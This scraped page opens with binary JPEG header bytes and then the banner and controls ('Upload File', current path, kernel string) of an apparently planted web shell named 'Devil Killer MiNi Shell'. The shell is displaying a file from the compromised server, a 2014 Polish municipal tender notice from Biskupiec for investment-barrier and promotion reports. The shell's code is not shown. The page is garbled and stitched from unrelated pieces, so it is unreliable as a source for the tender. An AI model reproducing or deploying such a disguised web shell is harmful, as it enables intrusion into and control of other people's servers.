JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140214/30169-N-2014.html

<p class="kh_header"><b>Biskupiec: Wzrost atrakcyjności i konkurencyjności terenów inwestycyjnych w Gminie Biskupiec - Etap I</b><br>
<b>Numer ogłoszenia: 30169 - 2014; data zamieszczenia: 14.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Biskupiec , al. Niepodległości 2, 11-300 Biskupiec, woj. warmińsko-mazurskie, tel. 89 7150110, faks 89 7152437.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.biskupiec.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wzrost atrakcyjności i konkurencyjności terenów inwestycyjnych w Gminie Biskupiec - Etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie raportu o barierach inwestycyjnych
Wykonawca zidentyfikuje istniejące bariery inwestycyjne na terenie Gminy Biskupiec, z którymi może zetknąć się inwestor w trakcie całego procesu inwestycyjnego począwszy od pierwszego kontaktu i pozyskania informacji o ofercie inwestycyjnej Biskupca a skończywszy na wsparciu post-inwestycyjnym. Wykonawca weźmie pod uwagę bariery organizacyjne, formalno-prawne oraz społeczne w procesie lokowania inwestycji. Wykonawca w dokumencie przedstawi możliwości niwelacji zidentyfikowanych barier oraz zarekomenduje plan działania dla Gminy Biskupiec mający na celu niwelację zidentyfikowanych barier inwestycyjnych. 
Raport należy wykonać w formie papierowej (5 egz.) i elektronicznej w formie edytowalnej (pliki tekstowe). 

Opracowanie informacji o klimacie inwestycyjnym
Wykonawca zidentyfikuje potencjał inwestycyjny Gminy Biskupiec oraz określi jej przewagi konkurencyjne. Wykonawca dokona analizy czynników, które mają wpływ na decyzję o ulokowaniu inwestycji na danym obszarze m.in. stan infrastruktury, dostęp do potencjalnej kadry, dostęp do surowców, dostęp do kooperantów, koszty prowadzenia działalności, system wsparcia procesu inwestycyjnego oraz pozostałe działania ważne z punktu widzenia przewag konkurencyjnych gminy. Opracowanie będzie zawierało informacje o dostępnych zachętach inwestycyjnych oraz dodatkowych narzędziach wsparcia obsługi inwestora wraz z informacją o ofercie inwestycyjnej Biskupca.
Celem niniejszego opracowania jest pomoc inwestorom w ocenie obecnej sytuacji gospodarczej w danej lokalizacji. Opracowanie ma również przedstawić sytuacje na rynku pracy, stan infrastruktury, powinno zawierać obszerne informacje o lokalnym rynku pracy, dominujących branżach w Gminie Biskupiec i Powiecie Olsztyńskim oraz największych firmach.
Niniejsze opracowanie będzie podstawą do obrania strategii promocji gospodarczej, a także określi grupę docelową inwestorów, do których powinna być skierowana oferta inwestycyjna Gminy Biskupiec.
Informację należy wykonać w formie papierowej (5 egz.) i elektronicznej w formie edytowalnej (pliki tekstowe). 
Wykonanie projektów doradczo - promocyjnych oraz opracowanie informacji o utworzonym terenie inwestycyjnym
Opracowanie propozycji usunięcia i niwelacji barier inwestycyjnych 
Wykonawca opracuje propozycję usunięcia i niwelacji barier inwestycyjnych oraz zaproponuje plan jej wdrożenia do akceptacji Zamawiającego. 
W/w plan ma na celu podjęcie stosownych działań celem poprawy klimatu inwestycyjnego na terenie Gminy Biskupiec m.in. poprzez utworzenie obcojęzycznej strony promującej gminę pod względem inwestycyjnym i gospodarczym, opracowanie i produkcję publikacji o klimacie inwestycyjnym Biskupca oraz materiałów informacyjno-promocyjnych Biskupca. 
Działania związane z opracowaniem propozycji usunięcia i niwelacji barier inwestycyjnych (stanowiących przedmiot zamówienia) oraz wdrożeniem opracowanego dokumentu, powinno wynosić ok. 70.000zł brutto. 
Opracowanie należy wykonać w formie papierowej (4 egz.) i elektronicznej w formie edytowalnej (m.in. pliki tekstowe). 
Opracowanie planu promocji informacji o klimacie inwestycyjnym Gminy Biskupiec 
Wykonawca opracuje plan promocji informacji o klimacie inwestycyjnym Gminy Biskupiec i przedstawi go do akceptacji Zamawiającego. Opracowany plan promocji powinien zawierać m.in. organizację wydarzeń mających na celu upowszechnianie informacji o opracowanej ofercie inwestycyjnej Gminy Biskupiec, realizację działań promocyjnych w mediach, organizację spotkań z potencjalnymi odbiorcami oferty inwestycyjnej, organizację udziału przedstawicieli Gminy w wydarzeniach mających na celu promocję możliwości inwestycyjnych Gminy Biskupiec. 
Działania związane z opracowaniem planu promocji informacji o klimacie inwestycyjnym Gminy Biskupiec (stanowiących przedmiot zamówienia) oraz wdrożeniem opracowanego dokumentu, powinno wynosić ok. 70.000zł brutto.
Opracowanie należy wykonać w formie papierowej (4 egz.) i elektronicznej w formie edytowalnej (m.in. pliki tekstowe). 
Ostateczny termin opracowania raportu o barierach inwestycyjnych: 30 kwiecień 2014r.
Ostateczny termin opracowania informacji o klimacie inwestycyjnym: 30 kwiecień 2014r.
Ostateczny termin wykonania projektów doradczo - promocyjnych oraz opracowanie informacji o utworzonym terenie inwestycyjnym: opracowanie propozycji usunięcia i niwelacji barier inwestycyjnych (15 maja 2014), opracowanie planu promocji informacji o klimacie inwestycyjnym Gminy Biskupiec (15 maja 2014r.)
Ostateczny termin realizacji całego zamówienia: 15 maja 2014r.
Zamawiający nie przewiduje aukcji elektronicznej.
Zamawiający nie zamierza zawrzeć umowy ramowej.
Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
Jeżeli w opisie przedmiotu zamówienia wskazano znak towarowy, patent lub pochodzenie należy przyjąć że Zamawiający nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń oraz że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie ofert równoważnych o parametrach techniczno/eksploatacyjno/użytkowych nie gorszych niż te, podane w opisie przedmiotu Zamówienia (art. 29 ust. 3 ustawy pzp).   
Analogicznie zgodnie z art. 30 ust. 4 ustawy pzp  w przypadku opisania przedmiotu zamówienia za pomocą norm,  aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 1-3 ustawy pzp, należy przyjąć, że dopuszczone są  rozwiązania równoważne opisywanym..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie, w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług  zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień zgodnych z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 73.22.00.00-0, 79.40.00.00-8, 72.22.10.00-0, 79.30.00.00-7, 71.24.10.00-9, 79.34.00.00-9, 79.34.11.00-7, 79.34.22.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 1 500,00 zł brutto (słownie: jeden tysiąc pięćset złotych,00/100 złotych)
2. Wadium musi być wniesione przed upływem terminu składania ofert, wskazanego w SIWZ.
3. Wadium może być wnoszone w jednej lub kilku następujących formach: 
1) pieniądzu; 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3) gwarancjach bankowych; 
4) gwarancjach ubezpieczeniowych; 
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.4)). 
4.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez zamawiającego tj. Bank Pocztowy S.A. placówka w Biskupcu 76 1320 1104 3132 3622 2000 0003.
5.Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
6.Jeżeli wadium zostanie wniesione w pieniądzu, przelewem, na poleceniu przelewu należy wpisać: Wadium - Wzrost atrakcyjności i konkurencyjności terenów inwestycyjnych w Gminie Biskupiec - Etap I.
W pozostałych przypadkach wymagane jest dostarczenie do dnia upływu składania ofert oryginału dokumentu wystawionego na rzecz Zamawiającego. 
7.W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data wpływu (data i godzina) środków na rachunek bankowy Zamawiającego.
8. Okoliczności i zasady zwrotu wadium, jego przepadku określa art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełniania przez Wykonawcę warunku Zamawiający żąda  wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami tj.
Punkt pierwszy:
Punkt 1.1.	co najmniej 2 osobami posiadającymi tytuł doktora w dziedzinie nauk ekonomicznych (osoba A i osoba B) oraz
Punkt 1.2.	co najmniej  2 osobami (osoba C i osoba D), z których każda:a Posiada co najmniej 3-letnie doświadczenie w doradzaniu podmiotom krajowym i zagranicznym w zakresie strategii rozwoju (typu: ocena klimatu inwestycyjnego, analizy zewnętrznego środowiska podmiotu) oraz b Opracowała w okresie ostatnich 3 lat co najmniej 2 dokumenty w zakresie:strategii rozwoju gospodarczego podmiotu i/lub strategii branżowej i/lub promocji możliwości gospodarczych (np. inwestycyjnych) podmiotu na rynku krajowym i zagranicznym oraz 
Punkt 1.3.	co najmniej  1 osobą (osoba E), która:a posiada co najmniej 3-letnie doświadczenie w opracowywaniu materiałów informacyjno - promocyjnych w zakresie rozwoju gospodarczego oraz b opracowała w okresie ostatnich 3 lat co najmniej 2 dokumenty w zakresie promocji możliwości gospodarczych (np. inwestycyjnych) podmiotu na rynku krajowym i zagranicznym oraz c posiada co najmniej 3-letnie doświadczenie w doradzaniu podmiotom krajowym i zagranicznym w zakresie strategii rozwoju (typu: ocena klimatu inwestycyjnego,  analizy zewnętrznego środowiska podmiotu). oraz Punkt Drugi:Jedna osoba wskazana w pkt. 1 (osoba A lub B lub C lub D lub E) brała udział w realizacji jednego lub kilku zamówień odnoszących się do opracowań nt. rozwoju gospodarczego na kwotę łączną jednego zamówienia lub kilku  zamówień min. 50 000 zł brutto w okresie ostatnich 3 lat.
Zespół wyżej wymienionych osób musi liczyć co najmniej 5 różnych osób (osoba A oraz B oraz C oraz D oraz E). 
Tylko osoba wymieniona w pkt.2 jest jednocześnie jedną z osób wymienionych w pkt 1. (osobą A lub B lub C lub D lub E). 
Osoba z pkt 2 nie może także nie być żadną z osób wymienionych w pkt 1.


Ocena spełnienia warunków nastąpi na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń. Nie wykazanie spełnienia warunków  spowoduje wykluczenie wykonawcy na mocy art. 24 ust. 2 pkt 4 z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy Formularz oferty według wzoru stanowiącego załącznik 1 do SIWZ.
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia  (odnośnie Sekcji III.3.4 niniejszego ogłoszenia - osób zdolnych do wykonania zamówienia na okres korzystania z nich przy wykonaniu zamówienia).
3. Zgodnie z art. 36a ust 1 ustawy pzp Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.
Zgodnie z art. 36a ust 2 ustawy pzp Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych części zamówienia.
Zamawiający nie żąda wskazania przez wykonawcę części zamówienia, której wykonanie zamierza powierzyć podwykonawcy.
Zamawiający nie żąda podania przez wykonawcę nazw (firm) podwykonawców, na których zasoby wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b ustawy pzp, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy pzp.
Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał
się, na zasadach określonych w art. 26 ust. 2b ustawy pzp, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy pzp, wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
Zgodnie z art. 143b ust 2 ustawy pzp termin zapłaty wynagrodzenia podwykonawcy lub dalszemu podwykonawcy przewidziany w umowie o podwykonawstwo nie może być dłuższy niż 30 dni od dnia doręczenia wykonawcy, podwykonawcy lub dalszemu podwykonawcy faktury lub rachunku, potwierdzających wykonanie zleconej podwykonawcy lub dalszemu podwykonawcy usługi.
Przepis stosuje się odpowiednio do zmian umowy o podwykonawstwo.
4.  Pełnomocnictwo - do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze. Pełnomocnictwo zawierać powinno umocowanie do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo może być przedłożone wyłącznie w formie oryginału lub kopii poświadczonej przez notariusza.
5. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa również dokumenty, o których mowa w niniejszym ogłoszeniu. 
6. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w rozumieniu art. 23 ust. 1 ustawy:
a.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego  ustanawiają Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy.
b.	W takim przypadku - oprócz dokumentów wymienionych w specyfikacji - wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego są zobowiązani do złożenia w ofercie Pełnomocnictwa ustanawiającego Pełnomocnika, o którym mowa w pkt. a. Pełnomocnictwo zawierać powinno umocowanie do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo może być przedłożone wyłącznie w formie oryginału lub kopii poświadczonej przez notariusza.
c.	Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia ( art. 23 ust. 3 ustawy Pzp.). Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia obowiązany jest wykazać, iż nie podlega wykluczeniu z udziału w postępowaniu, w świetle art. 24 ust. 2 pkt 5 ustawy Pzp. Natomiast  warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy Pzp, mogą być spełnione przez wykonawców wspólnie ubiegających o udzielenie zamówienia łącznie.
Forma dokumentów.
1. Dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. 
2. W przypadku składania elektronicznych dokumentów powinny być one opatrzone przez wykonawcę bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu.
3.  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.
4.  Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
5.  Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. Tłumaczenie nie jest wymagane, jeżeli zamawiający wyraził zgodę, o której mowa w art. 9 ust. 3 ustawy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany treści umowy zawartej z Wykonawcą możliwe będą jedynie w trybie art. 144 ustawy Prawo zamówień publicznych.
Przewidywane zmiany umowy:
a.	Przyczyna: zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy Zamawiający nie dopuszcza do zmiany personelu na osoby o innych kwalifikacjach zawodowych oraz innym doświadczeniu oraz innym wykształceniu niż opisano  niż opisano  w opisie sposobu dokonania oceny spełniania warunków udziału w postępowaniu o udzielenie zamówienia publicznego. 
Skutek: - zmiana w umowie/aneks - Zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy. 
b.	Przyczyna: zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu.
Skutek: zmiana w umowie/aneks - zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu.
c.	Przyczyna: działania siły wyższej i osób trzecich, od działania których uzależniona jest możliwość kontynuowania prac objętych niniejszą umową, zaistnienia zdarzenia zewnętrznego wobec łączącej strony więzi prawnej o charakterze niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem umowy, którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności, którego nie można przypisać drugiej stronie; Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne,  nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia.
Skutek: zmiana w umowie/aneks -  zmiana uwzględniająca wystąpienie wyżej wymienionych przesłanek oraz uwzględniająca konsekwencje ich wystąpienia w szczególności odnośnie zmiany terminu realizacji.
d.	 Przyczyna: zmiana albo rezygnacja z podwykonawcy jeżeli dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy pzp, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy pzp,
Skutek:  wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.

Nie stanowi istotnej zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych, w szczególności: 
a. zmiana danych związanych z obsługą administracyjno-organizaycjną Umowy (np. zmiana nr rachunku bankowego),
b. zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami. 
